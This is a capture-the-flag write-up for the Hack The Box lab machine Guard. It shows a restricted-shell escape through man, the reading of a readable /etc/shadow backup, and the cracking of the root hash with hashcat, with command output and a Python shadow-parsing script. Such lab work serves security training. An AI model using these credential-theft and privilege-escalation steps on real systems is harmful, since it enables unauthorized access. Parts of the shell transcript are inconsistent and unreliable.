HTB Starting Point – Guard

$ ./portScan.sh

[+] 10.10.10.50 scan started...
[-] Open ports : 22 found

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 22:07 CEST
Nmap scan report for 10.10.10.50
Host is up (0.044s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 2a:64:23:e0:a7:ec:1d:3b:f0:63:72:a7:d7:05:57:71 (RSA)
|   256 b3:86:5d:3d:c9:d1:70:ea:d6:3d:36:a6:c5:f2:be:5d (ECDSA)
|_  256 c0:5b:13:0f:d6:e6:d1:71:2d:55:e2:4a:e2:27:0e:c2 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.28 seconds
[+] 10.10.10.50 scan finished...

Only the SSH port is open.

Let's try the last SSH user we obtained, together with the id_rsa key recovered earlier.

$ ssh -i id_rsa daniel@10.10.10.50

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-88-generic x86_64)

* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage

  System information as of Mon Jun  1 20:22:44 UTC 2020

  System load:  0.0                Processes:             100
  Usage of /:   25.0% of 15.68GB   Users logged in:       0
  Memory usage: 11%                IP address for ens160: 10.10.10.50
  Swap usage:   0%

* Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

66 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Jun  1 16:57:35 2020 from 10.10.14.12
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

daniel@guard:~$

The SSH login gives us access to a restricted shell in which commands such as find, cat and python are disabled.

We are unable to read user.txt from this shell.
The man command can be used to spawn a bash shell: man man opens the manual in its pager, and a shell escape from the pager prompt drops us into bash, where cat works again.

daniel@guard:~$ man man

daniel@guard:~$ ls

user.txt

daniel@guard:~$ pwd

/home/picasso

daniel@guard:/home$ cd daniel

bash: cd: daniel: No such file or directory

daniel@guard:/home$ ls

user.txt

daniel@guard:~$ cat user.txt

2093XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Privilege Escalation

daniel@guard:/var$ ls

backups  cache crash  lib  local  lock  log  mail  opt  run  snap  spool  tmp

daniel@guard:/var$ ls -la

total 52
drwxr-xr-x 13 root root   4096 Aug  5  2019 .
drwxr-xr-x 24 root root   4096 Mar  5 09:48 ..
drwxr-xr-x  2 root root   4096 Jun  1 06:25 backups
drwxr-xr-x 10 root root   4096 Mar  5 13:03 cache
drwxrwxrwt  2 root root   4096 Aug  5  2019 crash
drwxr-xr-x 36 root root   4096 Mar  5 10:02 lib
drwxrwsr-x  2 root staff  4096 Apr 24  2018 local
lrwxrwxrwx  1 root root      9 Aug  5  2019 lock -> /run/lock
drwxrwxr-x  9 root syslog 4096 Jun  1 06:25 log
drwxrwsr-x  2 root mail   4096 Aug  5  2019 mail
drwxr-xr-x  2 root root   4096 Aug  5  2019 opt
lrwxrwxrwx  1 root root      4 Aug  5  2019 run -> /run
drwxr-xr-x  3 root root   4096 Mar  5 10:02 snap
drwxr-xr-x  4 root root   4096 Aug  5  2019 spool
drwxrwxrwt  4 root root   4096 Jun  1 04:35 tmp

There is a backup directory (/var/backups) and inside we find a backup of /etc/shadow that is readable by our unprivileged user.
Let's try to crack the root hash with hashcat.

daniel@guard:/var/backups$ cat shadow

root:$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:18334:0:99999:7:::
daemon:*:18113:0:99999:7:::
bin:*:18113:0:99999:7:::
sys:*:18113:0:99999:7:::
sync:*:18113:0:99999:7:::
games:*:18113:0:99999:7:::
man:*:18113:0:99999:7:::
lp:*:18113:0:99999:7:::
mail:*:18113:0:99999:7:::
news:*:18113:0:99999:7:::
uucp:*:18113:0:99999:7:::
proxy:*:18113:0:99999:7:::
www-data:*:18113:0:99999:7:::
backup:*:18113:0:99999:7:::
list:*:18113:0:99999:7:::
irc:*:18113:0:99999:7:::
gnats:*:18113:0:99999:7:::
nobody:*:18113:0:99999:7:::
systemd-network:*:18113:0:99999:7:::
systemd-resolve:*:18113:0:99999:7:::
syslog:*:18113:0:99999:7:::
messagebus:*:18113:0:99999:7:::
_apt:*:18113:0:99999:7:::
lxd:*:18113:0:99999:7:::
uuidd:*:18113:0:99999:7:::
dnsmasq:*:18113:0:99999:7:::
landscape:*:18113:0:99999:7:::
pollinate:*:18113:0:99999:7:::
sshd:*:18326:0:99999:7:::
daniel:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1:18326:0:99999:7:::
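As an added example (not part of the original writeup), a small Python script that audits a shadow backup like the one above: it splits each record into its nine colon-separated fields, keeps only accounts that carry a real crypt hash (not the locked "*" marker), maps the $6$ prefix to hashcat mode 1800, and emits just the hash field, since the aging fields (18334:0:99999:7:::) are not part of the hash. It also reproduces hashcat's ETA from the wordlist size and hash rate. The scheme table is an assumption of this example; the sample records are copied from the listing above.

```python
from dataclasses import dataclass
from typing import List, Optional

# Crypt prefix -> (algorithm, hashcat -m mode). Assumption of this example:
# only the common glibc schemes are listed.
SCHEMES = {"$1$": ("md5crypt", 500), "$5$": ("sha256crypt", 7400),
           "$6$": ("sha512crypt", 1800)}

# Three records copied from the /var/backups/shadow listing above.
SAMPLE_SHADOW = (
    "root:$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:18334:0:99999:7:::\n"
    "daemon:*:18113:0:99999:7:::\n"
    "daniel:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1:18326:0:99999:7:::\n"
)

@dataclass
class ShadowEntry:
    user: str
    hash_field: str
    last_change: int        # days since epoch of last password change
    crackable: bool         # True only if the field is a real crypt hash
    algorithm: Optional[str]
    hashcat_mode: Optional[int]

def parse_shadow_line(line: str) -> ShadowEntry:
    """Split one /etc/shadow record into its nine fields and classify it."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"expected 9 fields, got {len(fields)}: {line!r}")
    user, pw = fields[0], fields[1]
    # "*", "!", "!!" or an empty field mean locked / no password: nothing to crack.
    crackable = pw.startswith("$")
    algo = mode = None
    for prefix, (name, m) in SCHEMES.items():
        if pw.startswith(prefix):
            algo, mode = name, m
    return ShadowEntry(user, pw, int(fields[2] or 0), crackable, algo, mode)

def hashcat_lines(shadow_text: str, mode: int = 1800) -> List[str]:
    """Hash fields only, one per line, as a hashcat input file expects."""
    return [e.hash_field for e in map(parse_shadow_line, shadow_text.splitlines())
            if e.crackable and e.hashcat_mode == mode]

def estimate_seconds(keyspace: int, rate_hps: float) -> float:
    """Worst-case wordlist runtime: every candidate tried at the observed rate."""
    return keyspace / rate_hps

if __name__ == "__main__":
    for h in hashcat_lines(SAMPLE_SHADOW):
        print(h)
    # 14344385 rockyou candidates at the 672 H/s reported below: ~5.93 h
    print(f"{estimate_seconds(14344385, 672) / 3600:.2f} h")
```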

Only the hash field goes into hash.txt, single-quoted so the shell does not expand the $6 and $KIP2PX8O parts; the aging fields that follow it in the shadow line are not part of the hash.

$ echo '$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31' > hash.txt
$ hashcat -m 1800 --force hash.txt ../../ctf-tools/rockyou.txt

hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 1024/2955 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Uses-64-Bit

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=16 -D KERN_TYPE=1800 -D _unroll'
Dictionary cache hit:
* Filename..: ../../ctf-tools/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => q

Session..........: hashcat                       
Status...........: Quit
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbv...82hY31
Time.Started.....: Mon Jun  1 23:15:00 2020 (32 secs)
Time.Estimated...: Tue Jun  2 05:10:43 2020 (5 hours, 55 mins)
Guess.Base.......: File (../../ctf-tools/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      672 H/s (9.10ms) @ Accel:256 Loops:64 Thr:1 Vec:4
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 20992/14344385 (0.15%)
Rejected.........: 0/20992 (0.00%)
Restore.Point....: 20992/14344385 (0.15%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4736-4800
Candidates.#1....: sayangkamu -> 230990

Started: Mon Jun  1 23:14:56 2020
Stopped: Mon Jun  1 23:15:33 2020

The run above was quit after 32 seconds; with the root hash in hash.txt, the following command, left to run to completion, cracks it.

$ hashcat -m 1800 --force hash.txt ../../ctf-tools/rockyou.txt

After it succeeds, use the following command to show the cracked password.

$ hashcat -m 1800 --force hash.txt ../../ctf-tools/rockyou.txt --show

$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:password#1

This reveals the root password to be password#1, which can be used to su to root or, as here, to log in directly over SSH.

$ ssh root@10.10.10.50

root@10.10.10.50's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-88-generic x86_64)

* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage

  System information as of Mon Jun  1 21:38:36 UTC 2020

  System load:  0.0                Processes:             109
  Usage of /:   25.0% of 15.68GB   Users logged in:       1
  Memory usage: 11%                IP address for ens160: 10.10.10.50
  Swap usage:   0%

* Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

66 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Jun  1 18:37:34 2020 from 10.10.14.2
root@guard:~#

root@guard:~# cat root.txt

386cXXXXXXXXXXXXXXXXXXXXXXXXXXXX
